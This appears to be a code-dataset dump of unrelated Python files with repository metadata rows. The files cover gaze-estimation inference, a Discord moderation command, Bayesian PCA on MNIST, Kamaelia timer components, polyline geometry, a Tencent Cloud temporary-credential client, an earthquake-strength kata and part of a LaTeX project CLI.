start_inference_time = time.time()
counter = 0
for batch in feed.next_batch():
if np.shape(batch) != ():
counter+=1
ppi_fd = Face_Det.preprocess_input(batch)
outputs_fd = Face_Det.predict(ppi_fd)
ppo_fd, ymin, ymax, xmin, xmax = Face_Det.preprocess_output(batch, width, height, conf, outputs_fd)
ppi_hpe = Head_Pose.preprocess_input(ppo_fd)
(yaw_a, pitch_a, roll_a) = Head_Pose.predict(ppi_hpe)
(yaw, pitch, roll) = Head_Pose.preprocess_output(yaw_a, pitch_a, roll_a)
(ppi_fld, height_fd, width_fd) = Landmarks_Det.preprocess_input(ppo_fd)
outputs_fld = Landmarks_Det.predict(ppi_fld)
(left_eye, right_eye, batch, ppo_fd_) = Landmarks_Det.preprocess_output(batch, ppo_fd, height_fd, width_fd, outputs_fld, ymin, ymax, xmin, xmax, flag_fld)
if np.shape(left_eye) != () and np.shape(right_eye) != () and np.sum(left_eye) != 0 and np.sum(right_eye) != 0:
(ppi_ge_left, ppi_ge_right) = Gaze_Det.preprocess_input(left_eye, right_eye)
outputs_ge = Gaze_Det.predict(ppi_ge_left, ppi_ge_right, yaw, pitch, roll)
(x,y,z) = Gaze_Det.preprocess_output(outputs_ge)
print(x,y,z)
print(counter)
else:
continue
(screen_width, screen_height) = pyautogui.size()
mouse.move(x, y)
(xx, yy) = pyautogui.position()
xx = int((width/screen_width)*xx)
yy = int((height/screen_height)*yy)
batch[(yy-14):(yy+14),(xx-7):(xx+7)]=[0,0,255]
if flag_fd:
cv2.rectangle(batch, (xmin, ymin), (xmax, ymax), (0,0,255), 3)
out_video.write(batch)
else:
break
feed.close()
total_time=time.time()-start_inference_time
total_inference_time=round(total_time, 1)
fps_avg=counter/total_inference_time
with open(os.path.join('/home/workspace/CPC_project/results/', 'stats.txt'), 'w') as f:
f.write(str(total_lt_fd)+'\n')
f.write(str(total_lt_hpe)+'\n')
f.write(str(total_lt_fld)+'\n')
f.write(str(total_lt_ge)+'\n')
f.write(str(total_inference_time)+'\n')
f.write(str(fps_avg)+'\n')
print(f"Load_Time-Face-Detection-Model:{total_lt_fd}")
print(f"Load_Time-Head-Pose-Estimation-Model:{total_lt_hpe}")
print(f"Load_Time-Facial-Landmarks-Detection-Model:{total_lt_fld}")
print(f"Load_Time-Gaze-Estimation-Model:{total_lt_ge}")
print(f"Total_Inference_Time:{total_inference_time}")
print(f"FPS average:{fps_avg}")
print(f"Total no. of frames:{counter}")
cv2.destroyAllWindows()
if __name__ == '__main__':
args = build_parser().parse_args()
main(args)
| 47.368421 | 279 | 0.647778 | 1,005 | 7,200 | 4.410945 | 0.230846 | 0.029777 | 0.025716 | 0.025716 | 0.213174 | 0.163997 | 0.100383 | 0.087751 | 0.053012 | 0.044665 | 0 | 0.008059 | 0.241667 | 7,200 | 152 | 280 | 47.368421 | 0.803846 | 0 | 0 | 0.033333 | 0 | 0.016667 | 0.247721 | 0.045145 | 0 | 0 | 0.001447 | 0 | 0 | 1 | 0.016667 | false | 0 | 0.116667 | 0 | 0.141667 | 0.075 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6859e42b7787e019db751ab64cf0c502a0c439 | 425 | py | Python | forumsweats/commands/unmoot.py | duckiecousingaming/forum-sweats | 6addf3159e59902a6905c25240bf54f8a7a00e76 | [
"MIT"
] | 10 | 2020-10-15T18:08:53.000Z | 2021-12-11T13:15:05.000Z | forumsweats/commands/unmoot.py | duckiecousingaming/forum-sweats | 6addf3159e59902a6905c25240bf54f8a7a00e76 | [
"MIT"
] | 59 | 2020-10-06T23:19:25.000Z | 2022-03-06T14:16:31.000Z | forumsweats/commands/unmoot.py | duckiecousingaming/forum-sweats | 6addf3159e59902a6905c25240bf54f8a7a00e76 | [
"MIT"
] | 13 | 2020-10-19T20:46:47.000Z | 2022-03-05T20:17:40.000Z | from ..commandparser import Member
from ..discordbot import unmoot_user
import discord
name = 'unmoot'
channels = None
roles = ('helper', 'trialhelper')
args = '<member>'
async def run(message, member: Member):
'Removes a moot from a member'
await unmoot_user(
member.id,
reason=f'Unmooted by {str(message.author)}'
)
await message.send(embed=discord.Embed(
description=f'<@{member.id}> has been unmooted.'
))
| 20.238095 | 50 | 0.717647 | 57 | 425 | 5.315789 | 0.614035 | 0.066007 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148235 | 425 | 20 | 51 | 21.25 | 0.837017 | 0 | 0 | 0 | 0 | 0 | 0.294118 | 0.049412 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.1875 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df69316b0035a262181610684f3b3f628ccdb9dd | 1,531 | py | Python | datareduction/TestPCA_MNIST.py | andresmasegosa/PRML-CoreSets | fb768debb15e3ff6f5b65b7224915a41c1493f3d | [
"MIT"
] | null | null | null | datareduction/TestPCA_MNIST.py | andresmasegosa/PRML-CoreSets | fb768debb15e3ff6f5b65b7224915a41c1493f3d | [
"MIT"
] | null | null | null | datareduction/TestPCA_MNIST.py | andresmasegosa/PRML-CoreSets | fb768debb15e3ff6f5b65b7224915a41c1493f3d | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import KMeans
from sklearn import datasets
from datareduction.bayesian_pca_DR import BayesianPCA_DR
from prml.feature_extractions import BayesianPCA, PCA
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/")
data = mnist.train.images
target = mnist.train.labels
x_train = data[np.random.choice(np.where(target == 3)[0], 1000)]
D=data.shape[1]
data = mnist.test.images
target = mnist.test.labels
x_test = data[np.random.choice(np.where(target == 3)[0], 1000)]
mnist3 = x_train
pca = BayesianPCA(n_components=4)
pca.fit(mnist3, initial="eigen")
plt.figure(0)
plt.subplot(1, 5, 1)
plt.imshow(pca.mean.reshape(28, 28))
plt.axis('off')
for i, w in enumerate(pca.W.T[::-1]):
plt.subplot(1, 5, i + 2)
plt.imshow(w.reshape(28, 28))
plt.axis('off')
#plt.show()
pca = BayesianPCA_DR(n_components=4)
pca.fit(mnist3, initial="eigen", n_clusters=100, cluster_method="SS")
plt.figure(1)
plt.subplot(1, 5, 1)
plt.imshow(pca.mean.reshape(28, 28))
plt.axis('off')
for i, w in enumerate(pca.W.T[::-1]):
plt.subplot(1, 5, i + 2)
plt.imshow(w.reshape(28, 28))
plt.axis('off')
pca = BayesianPCA_DR(n_components=4)
pca.fit(mnist3, initial="eigen", n_clusters=10, cluster_method="NoSS")
plt.figure(2)
plt.subplot(1, 5, 1)
plt.imshow(pca.mean.reshape(28, 28))
plt.axis('off')
for i, w in enumerate(pca.W.T[::-1]):
plt.subplot(1, 5, i + 2)
plt.imshow(w.reshape(28, 28))
plt.axis('off')
| 27.339286 | 70 | 0.70934 | 268 | 1,531 | 3.973881 | 0.272388 | 0.026291 | 0.061972 | 0.067606 | 0.548357 | 0.547418 | 0.547418 | 0.547418 | 0.513615 | 0.513615 | 0 | 0.054195 | 0.120183 | 1,531 | 55 | 71 | 27.836364 | 0.736451 | 0.006532 | 0 | 0.5 | 0 | 0 | 0.032895 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.152174 | 0 | 0.152174 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6a3a82390987ac2500ff7fb4289e4ffe93a4b6 | 5,520 | py | Python | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/SA/Time.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 12 | 2015-10-20T10:22:01.000Z | 2021-07-19T10:09:44.000Z | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/SA/Time.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 2 | 2015-10-20T10:22:55.000Z | 2017-02-13T11:05:25.000Z | Sketches/MPS/BugReports/FixTests/Kamaelia/Kamaelia/Apps/SA/Time.py | sparkslabs/kamaelia_orig | 24b5f855a63421a1f7c6c7a35a7f4629ed955316 | [
"Apache-2.0"
] | 6 | 2015-03-09T12:51:59.000Z | 2020-03-01T13:06:21.000Z | # -*- coding: utf-8 -*-
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
'''
This file contains some utility classes which are used by both the client and
server components of the port tester application.
'''
import time
import Axon
from Axon.Ipc import producerFinished, shutdownMicroprocess, shutdown
from Kamaelia.IPC import serverShutdown
# FIXME: Needs example of usage. Very similar to lots of existing
# FIXME: components, but with probably much more accuracy - so nabbing
# FIXME: one of those examples would be good.
#
# FIXME: SingleTick is a specialisation of PeriodicTick. If PeriodicTick had
# FIXME: a "maximum number of ticks" option, that would eliminate the need for
# FIXME: SingleTick to duplicate code. (Name could still exist, names are
# FIXME: good :-) - but be a factory method (aka prefab) instead - or
# FIXME: better a class which changes the default count argument :-)
class SingleTick(Axon.ThreadedComponent.threadedcomponent):
'''
This threaded component will wait "delay" seconds then send True out it's
outbox and shutdown. You can specify an optional "check_interval" which
will cause the component to periodically check it's control inbox for
early termination signals.
SingleTick(delay, check_interval=delay, tick_mesg=True)
'''
Inboxes = {'inbox':'ignored',
'control':'Sending a message here will cause the component to shutdown'}
Outboxes= {'outbox':'Sends "tick_mesg" (def: True) after "delay" seconds unless interrupted first',
'signal':'Sends producerFinished if not interrupted else sends interruption message'}
tick_mesg = True
check_interval = None
def __init__(self, delay, **kwargs):
super(SingleTick, self).__init__(**kwargs)
self.delay = delay
if self.check_interval is None or self.check_interval > delay:
self.check_interval = delay
def main(self):
delay_until = time.time() + self.delay
remaining = self.delay
while remaining > 0 and not self.dataReady('control'):
if remaining < self.check_interval:
self.pause(remaining)
else:
self.pause(self.check_interval)
remaining = delay_until - time.time()
if remaining <= 0:
self.send(self.tick_mesg, 'outbox')
self.send(producerFinished(self), 'signal')
elif self.dataReady('control'):
self.send(self.recv('control'), 'signal')
class PeriodicTick(Axon.ThreadedComponent.threadedcomponent):
'''
This threaded component will periodically (every "delay" seconds) send
True out it's outbox. You can specify an optional "check_interval" which
will cause the component to more frequently check it's control inbox for
termination signals.
PeriodicTick(delay, check_interval=delay, tick_mesg=True)
'''
Inboxes = {'inbox':'ignored',
'control':'Sending a message here will cause the component to shutdown'}
Outboxes= {'outbox':'Sends a "tick_mesg" (def: True) every "delay" seconds',
'signal':'Sends terminiation signal received on "control"'}
tick_mesg = True
check_interval = None
def __init__(self, delay, **kwargs):
super(PeriodicTick, self).__init__(**kwargs)
self.delay = delay
if self.check_interval is None or self.check_interval > delay:
self.check_interval = delay
def main(self):
start_time = time.time()
tick_count = 1
while not self.dataReady('control'):
delay_until = start_time + self.delay * tick_count
remaining = delay_until - time.time()
while remaining > 0 and not self.dataReady('control'):
if remaining < self.check_interval:
self.pause(remaining)
else:
self.pause(self.check_interval)
remaining = delay_until - time.time()
if remaining <= 0:
self.send(self.tick_mesg, 'outbox')
tick_count += 1
self.send(self.recv('control'), 'signal')
if __name__=="__main__":
from Kamaelia.Chassis.Pipeline import Pipeline
from Kamaelia.Util.Console import ConsoleEchoer
if 0:
Pipeline(
PeriodicTick(0.3),
ConsoleEchoer(use_repr=True),
).run()
if 0:
Pipeline(
PeriodicTick(0.3, tick_mesg="Hello\n"),
ConsoleEchoer(),
).run()
if 0:
Pipeline(
PeriodicTick(delay=0.3,tick_mesg="Hello\n",check_interval=0.01),
ConsoleEchoer(),
).run()
Pipeline(
SingleTick(0.3),
ConsoleEchoer(use_repr=True),
).run()
| 37.297297 | 104 | 0.655978 | 681 | 5,520 | 5.22467 | 0.323054 | 0.062114 | 0.04778 | 0.023609 | 0.433671 | 0.418775 | 0.35638 | 0.304666 | 0.304666 | 0.304666 | 0 | 0.007522 | 0.253442 | 5,520 | 147 | 105 | 37.55102 | 0.85586 | 0.368297 | 0 | 0.65 | 0 | 0 | 0.154642 | 0 | 0 | 0 | 0 | 0.006803 | 0 | 1 | 0.05 | false | 0 | 0.075 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6a3f97128cd0432d6dd7f8b604aa0b9b234860 | 4,180 | py | Python | p3iv_utils_polyline/src/p3iv_utils_polyline/interpolated_polyline_segment.py | fzi-forschungszentrum-informatik/P3IV | 51784e6dc03dcaa0ad58a5078475fa4daec774bd | [
"BSD-3-Clause"
] | 4 | 2021-07-27T06:56:22.000Z | 2022-03-22T11:21:30.000Z | p3iv_utils_polyline/src/p3iv_utils_polyline/interpolated_polyline_segment.py | fzi-forschungszentrum-informatik/P3IV | 51784e6dc03dcaa0ad58a5078475fa4daec774bd | [
"BSD-3-Clause"
] | null | null | null | p3iv_utils_polyline/src/p3iv_utils_polyline/interpolated_polyline_segment.py | fzi-forschungszentrum-informatik/P3IV | 51784e6dc03dcaa0ad58a5078475fa4daec774bd | [
"BSD-3-Clause"
] | 1 | 2021-10-10T01:56:44.000Z | 2021-10-10T01:56:44.000Z | # This file is part of the P3IV Simulator (https://github.com/fzi-forschungszentrum-informatik/P3IV),
# copyright by FZI Forschungszentrum Informatik, licensed under the BSD-3 license (see LICENSE file in main directory)
import numpy as np
import warnings
def hypot(a, b):
# do not use np.hypot(a, b); may not work well with autodiff & jit
return (a ** 2 + b ** 2) ** 0.5
class InterpolatedPolylineSegment(object):
def __init__(self, xB, yB, thetaB, xT, yT, thetaT, mode):
self.xB = xB
self.yB = yB
self.thetaB = thetaB
self.thetaT = thetaT
self.theta = np.arctan2(yT - yB, xT - xB)
self.cosTheta = np.cos(self.theta)
self.sinTheta = np.sin(self.theta)
self.hyp = hypot(yT - yB, xT - xB)
self.mB = np.tan(thetaB - self.theta)
self.mT = np.tan(thetaT - self.theta)
self.mode = mode
self._MAX_VALUE = 1e10
# do not use float(inf)
def __call__(self, x, y):
xH, yH = self._convertHesseNormal(x, y)
# signum on line-aligned coordinate system is the sign of y-axis
signum = np.sign(yH)
# calculate interpolation factor
lmda = self._getLambda(self.hyp, self.mB, self.mT, xH, yH)
valid, lmda = self._clipLambda(lmda)
if valid:
# this is the segment, that may be closest to the point (for mode='MIDDLE')
d = signum * self._normalDistance(self.hyp, xH, yH, lmda)
# print("MIDDLE ", "x: ", xr, "y: ", yr,"d : ", d, "lambda : ", lmda)
else:
d = signum * self._MAX_VALUE
return d, lmda
def length(self, lmda=1.0):
return lmda * self.hyp
def tangent(self, x, y, d, lmda):
xH, yH = self._convertHesseNormal(x, y)
# add 'theta' to get tangent in global Cartesian frame
tangent = self._getTangent(self.hyp, xH, yH, d, lmda, self.mB, self.mT) + self.theta
return tangent
def getBase(self):
return self.xB, self.yB, self.theta
def _clipLambda(self, lmda):
"""
Check interpolation factor if it is valid and clip it
"""
valid = True
if (lmda < 0.0) or (lmda > 1.0):
if self.mode == "MIDDLE":
# skip to the next segment in polyline
valid = False
elif self.mode == "FIRST":
if lmda < 0.0:
lmda = 0.0
elif lmda > 1.0:
valid = False
elif self.mode == "LAST":
# let the last segment's lambda be flexible
if lmda > 1.0:
lmda = 1.0
elif lmda < 0.0:
valid = False
else:
warnings.warn("An unexpected case detected!")
valid = False
return (valid, lmda)
def _convertHesseNormal(self, x, y):
"""
Convert to Hesse-normal form; aka line-aligned coordinate frame
"""
# calculate the difference of the given point to the one end of the line
xx = x - self.xB
yy = y - self.yB
# rotate point Theta clockwise for line-referenced coordinates
xH = xx * self.cosTheta + yy * self.sinTheta
yH = -xx * self.sinTheta + yy * self.cosTheta
return xH, yH
@staticmethod
def _getTangent(l, xH, yH, d, lmda, mB, mT):
"""
Get tangent vector angle in line-aligned coordinates
"""
if d == 0:
return lmda * mB + (1 - lmda) * mT
dx = np.divide(-1 * (lmda * l - xH), d)
dy = np.divide(-1 * (-yH), d)
dTheta = np.arctan2(dy, dx) # normal vector
tangent = dTheta - np.pi / 2 # tangent vector
return tangent
@staticmethod
def _getLambda(l, mb, mt, xH, yH):
"""
Calculate interpolation factor lambda
"""
# cf. Eq. (3.9) in Diss. Ziegler
return (xH + yH * mb) / (l - yH * (mt - mb))
@staticmethod
def _normalDistance(l, xH, yH, lmda):
"""
Find the normal distance in Hesse normal form
"""
return hypot((lmda * l - xH), yH)
| 30.735294 | 118 | 0.539952 | 548 | 4,180 | 4.076642 | 0.315693 | 0.019696 | 0.013429 | 0.007162 | 0.055506 | 0.025067 | 0 | 0 | 0 | 0 | 0 | 0.013643 | 0.351196 | 4,180 | 135 | 119 | 30.962963 | 0.810103 | 0.267703 | 0 | 0.171053 | 0 | 0 | 0.014676 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.144737 | false | 0 | 0.026316 | 0.039474 | 0.328947 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6ca557f603a97a74f408033965ff6cad9e9699 | 6,901 | py | Python | python/build/lib/sts/sts.py | BrandoZhang/qcloud-cos-sts-sdk | 84b5fdfaaba00ed7eb1c35146e693b22a07fc877 | [
"MIT"
] | 1 | 2019-07-09T09:35:44.000Z | 2019-07-09T09:35:44.000Z | python/build/lib/sts/sts.py | BrandoZhang/qcloud-cos-sts-sdk | 84b5fdfaaba00ed7eb1c35146e693b22a07fc877 | [
"MIT"
] | null | null | null | python/build/lib/sts/sts.py | BrandoZhang/qcloud-cos-sts-sdk | 84b5fdfaaba00ed7eb1c35146e693b22a07fc877 | [
"MIT"
] | null | null | null | # -*- coding:utf-8 -*-
import hashlib
import hmac
import time
try:
from urllib import quote # Python 2.X
except ImportError:
from urllib.parse import quote # Python 3+
from functools import reduce
import json
import base64
import requests
import random
class Sts:
def __init__(self, config={}):
if 'allow_actions' in config:
self.allow_actions = config.get('allow_actions')
# else:
# raise ValueError('missing allow_actions')
if 'duration_seconds' in config:
self.duration = config.get('duration_seconds')
if not isinstance(self.duration, int):
raise ValueError('duration_seconds must be int type')
else:
self.duration = 1800
self.sts_url = 'sts.tencentcloudapi.com/'
self.sts_scheme = 'https://'
self.secret_id = config.get('secret_id')
self.secret_key = config.get('secret_key')
self.proxy = config.get('proxy')
self.region = config.get('region')
self.policy = config.get('policy')
bucket = config.get('bucket')
if bucket is not None:
split_index = bucket.rfind('-')
short_bucket_name = bucket[:split_index]
appid = bucket[(split_index+1):]
self.resource = "qcs::cos:{region}:uid/{appid}:prefix//{appid}/{short_bucket_name}/{allow_prefix}".format(
region=config['region'], appid=appid, short_bucket_name=short_bucket_name,
allow_prefix=config['allow_prefix']
)
@staticmethod
def get_policy(scopes=[]):
if not isinstance(scopes, list):
return None
policy = dict()
policy['version'] = '2.0'
statement = list()
for scope in scopes:
statement_element = dict()
actions = list()
resources = list()
actions.append(scope.get_action())
statement_element['action'] = actions
statement_element['effect'] = 'allow'
principal = dict()
principal['qcs'] = list('*')
statement_element['principal'] = principal
resources.append(scope.get_resource())
statement_element['resource'] = resources
statement.append(statement_element)
policy['statement'] = statement
return policy
def get_credential(self):
try:
import ssl
except ImportError as e:
raise e
if self.policy is None:
policy = {
'version': '2.0',
'statement': {
'action': self.allow_actions,
'effect': 'allow',
'principal': {'qcs': '*'},
'resource': self.resource
}
}
else:
policy = self.policy
policy_encode = quote(json.dumps(policy))
data = {
'SecretId': self.secret_id,
'Timestamp': int(time.time()),
'Nonce': random.randint(100000, 200000),
'Action': 'GetFederationToken',
'Version': '2018-08-13',
'DurationSeconds':self.duration,
'Name': 'cos-sts-python',
'Policy': policy_encode,
'Region': 'ap-guangzhou'
}
data['Signature'] = self.__encrypt('POST', self.sts_url, data)
try:
response = requests.post(self.sts_scheme + self.sts_url, proxies=self.proxy, data=data)
result_json = response.json()
if isinstance(result_json['Response'], dict):
result_json = result_json['Response']
result_json['startTime'] = result_json['ExpiredTime'] - self.duration
return self._backwardCompat(result_json)
except requests.exceptions.HTTPError as e:
raise e
def __encrypt(self, method, url, key_values):
source = Tools.flat_params(key_values)
source = method + url + '?' + source
try:
key = bytes(self.secret_key) # Python 2.X
source = bytes(source)
except TypeError:
key = bytes(self.secret_key, encoding='utf-8') # Python 3.X
source = bytes(source, encoding='utf-8')
sign = hmac.new(key, source, hashlib.sha1).digest()
sign = base64.b64encode(sign).rstrip()
return sign
# v2接口的key首字母小写,v3改成大写,此处做了向下兼容
def _backwardCompat(self, result_json):
bc_json = dict()
for k,v in result_json.items():
if isinstance(v, dict):
bc_json[k[0].lower() + k[1:]] = self._backwardCompat(v)
elif k == 'Token':
bc_json['sessionToken'] = v
else:
bc_json[k[0].lower() + k[1:]] = v
return bc_json
class Tools(object):
@staticmethod
def _flat_key_values(a):
return a[0] + '=' + str(a[1])
@staticmethod
def _link_key_values(a, b):
return a + '&' + b
@staticmethod
def flat_params(key_values):
key_values = sorted(key_values.items(), key=lambda d: d[0])
return reduce(Tools._link_key_values, map(Tools._flat_key_values, key_values))
class Scope(object):
action = None
bucket = None
region = None
resource_prefix = None
def __init__(self, action=None, bucket=None, region=None, resource_prefix=None):
self.action = action
self.bucket = bucket
self.region = region
self.resource_prefix = resource_prefix
def set_bucket(self, bucket):
self.bucket = bucket
def set_region(self, region):
self.region = region
def set_action(self, action):
self.action = action
def set_resource_prefix(self, resource_prefix):
self.resource_prefix = resource_prefix
def get_action(self):
return self.action
def get_resource(self):
split_index = self.bucket.rfind('-')
bucket_name = str(self.bucket[:split_index]).strip()
appid = str(self.bucket[(split_index + 1):]).strip()
if not str(self.resource_prefix).startswith('/'):
self.resource_prefix = '/' + self.resource_prefix
resource = "qcs::cos:{region}:uid/{appid}:" \
"prefix//{appid}/{bucket_name}{prefix}".format(region=self.region,
appid=appid,
bucket_name=bucket_name,
prefix=self.resource_prefix)
return resource
def get_dict(self):
result = dict()
result['action'] = self.action;
result['bucket'] = self.bucket
result['region'] = self.region
result['prefix'] = self.resource_prefix
return result
| 31.655963 | 118 | 0.555282 | 733 | 6,901 | 5.061392 | 0.218281 | 0.049057 | 0.038814 | 0.032345 | 0.15903 | 0.08841 | 0.07655 | 0.0469 | 0.025876 | 0 | 0 | 0.011457 | 0.329662 | 6,901 | 217 | 119 | 31.801843 | 0.790532 | 0.021011 | 0 | 0.122807 | 0 | 0 | 0.099466 | 0.025348 | 0 | 0 | 0 | 0 | 0 | 1 | 0.093567 | false | 0 | 0.076023 | 0.017544 | 0.274854 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6d0d07bf48436061a0838a663ce18440a66dc5 | 1,675 | py | Python | python/earthquake.py | FranzSchubert92/cw | e59bab1f942f17a17bbf05a3c87733bae6ab1ebb | [
"BSD-3-Clause"
] | 1 | 2017-09-07T21:14:40.000Z | 2017-09-07T21:14:40.000Z | python/earthquake.py | FranzSchubert92/cw | e59bab1f942f17a17bbf05a3c87733bae6ab1ebb | [
"BSD-3-Clause"
] | null | null | null | python/earthquake.py | FranzSchubert92/cw | e59bab1f942f17a17bbf05a3c87733bae6ab1ebb | [
"BSD-3-Clause"
] | null | null | null | """
You have been employed by the Japanese government to write a function that tests
whether or not a building is strong enough to withstand a simulated earthquake.
A building will fall if the magnitude of the earthquake is greater than the
strength of the building.
An earthquake takes the form of a 2D-Array. Each element within the Outer-Array
represents a shockwave, and each element within the Inner-Arrays represents a
tremor. The magnitude of the earthquake is determined by the product of the
values of its shockwaves. A shockwave is equal to the sum of the values of its
tremors.
Example earthquake -->
[[5,3,7],[3,3,1],[4,1,2]] ((5+3+7) * (3+3+1) * (4+1+2)) = 735
A building begins with a strength value of 1000 when first built, but this
value is subject to exponential decay of 1% per year. For more info on
exponential decay, follow this link -
https://en.wikipedia.org/wiki/Exponential_decay
Given an earthquake and the age of a building, write a function that returns
"Safe!" if the building is strong enough, or "Needs Reinforcement!" if it falls.
>>> strong_enough( [[5,3,7],[3,3,1],[4,1,2]], 0)
'Safe!'
>>> strong_enough( [[5,8,7],[3,3,1],[4,1,2]], 2)
'Safe!'
>>> strong_enough( [[5,8,7],[3,3,1],[4,1,2]], 3)
'Needs Reinforcement!'
"""
from functools import reduce
from operator import mul
def strong_enough( earthquake, age ):
TXT_S, TXT_R = "Safe!", "Needs Reinforcement!"
building_strength = 1000 * 0.99**(age)
quake_strength = reduce(mul, (sum(wave) for wave in earthquake))
return TXT_R if quake_strength > building_strength else TXT_S
if __name__ == '__main__':
import doctest
doctest.testmod()
| 33.5 | 81 | 0.714627 | 284 | 1,675 | 4.140845 | 0.415493 | 0.061224 | 0.012755 | 0.017007 | 0.142007 | 0.114796 | 0.065476 | 0.065476 | 0.065476 | 0.042517 | 0 | 0.04631 | 0.174925 | 1,675 | 49 | 82 | 34.183673 | 0.804631 | 0.758209 | 0 | 0 | 0 | 0 | 0.083544 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.1 | false | 0 | 0.3 | 0 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6d275991d90be0d5dbb0d47ae92a44046ed849 | 20,186 | py | Python | src/texproject/command.py | alexrutar/texproject | ba7427ecfd7a9141bfce61ae30b2abc3ada69d2c | [
"MIT"
] | 1 | 2020-07-05T04:13:42.000Z | 2020-07-05T04:13:42.000Z | src/texproject/command.py | alexrutar/texproject | ba7427ecfd7a9141bfce61ae30b2abc3ada69d2c | [
"MIT"
] | null | null | null | src/texproject/command.py | alexrutar/texproject | ba7427ecfd7a9141bfce61ae30b2abc3ada69d2c | [
"MIT"
] | null | null | null | """TODO: write docstring"""
from __future__ import annotations
from dataclasses import astuple
from difflib import unified_diff
from functools import update_wrapper
from pathlib import Path
import sys
import tempfile
from typing import TYPE_CHECKING
import click
from . import __version__, __repo__
from .base import SHUTIL_ARCHIVE_FORMATS, SHUTIL_ARCHIVE_SUFFIX_MAP
from .error import AbortRunner, ValidationError
from .export import ArchiveWriter
from .filesystem import (
ProjectPath,
NAMES,
style_linker,
macro_linker,
citation_linker,
template_linker,
toml_load_local_template,
)
from .git import CreateGithubRepo, WriteGithubApiToken
from .process import LatexCompiler, InitializeGitRepo
from .template import (
OutputFolderCreator,
InfoFileWriter,
GitignoreWriter,
PrecommitWriter,
TemplateDictLinker,
FileEditor,
NameSequenceLinker,
PathSequenceLinker,
ApplyModificationSequence,
TemplateDictWriter,
GitFileWriter,
LatexBuildWriter,
UpgradeRepository,
CleanRepository,
)
if TYPE_CHECKING:
from .base import Modes, NAMES, RepoVisibility
from typing import Optional, Iterable, Any, List, Literal, Dict, Final, Callable
from .control import AtomicIterable, RuntimeClosure
class CommandRunner:
def __init__(
self, proj_path: ProjectPath, template_dict: Dict, dry_run=False, verbose=True
):
self._proj_path: Final = proj_path
self._template_dict: Final = template_dict
self._dry_run = dry_run
self._verbose = verbose
def atomic_outputs(
self,
command_iter: Iterable[AtomicIterable],
state_init: Callable[[], Dict[str, Any]] = lambda: {},
) -> Iterable[RuntimeClosure]:
state = state_init()
for at_iter in command_iter:
with tempfile.TemporaryDirectory() as temp_dir_str:
temp_dir = Path(temp_dir_str)
yield from at_iter(
self._proj_path, self._template_dict, state, temp_dir
)
def process_output(self, rtc: RuntimeClosure):
# add dry_run and verbose processing here
inferred_success = rtc.success()
if self._dry_run:
click.echo(rtc.message())
return inferred_success
else:
success, out = astuple(rtc.run())
if self._verbose:
if success:
click.echo(rtc.message())
else:
click.secho(click.unstyle(rtc.message()), fg="red", err=True)
if out is not None:
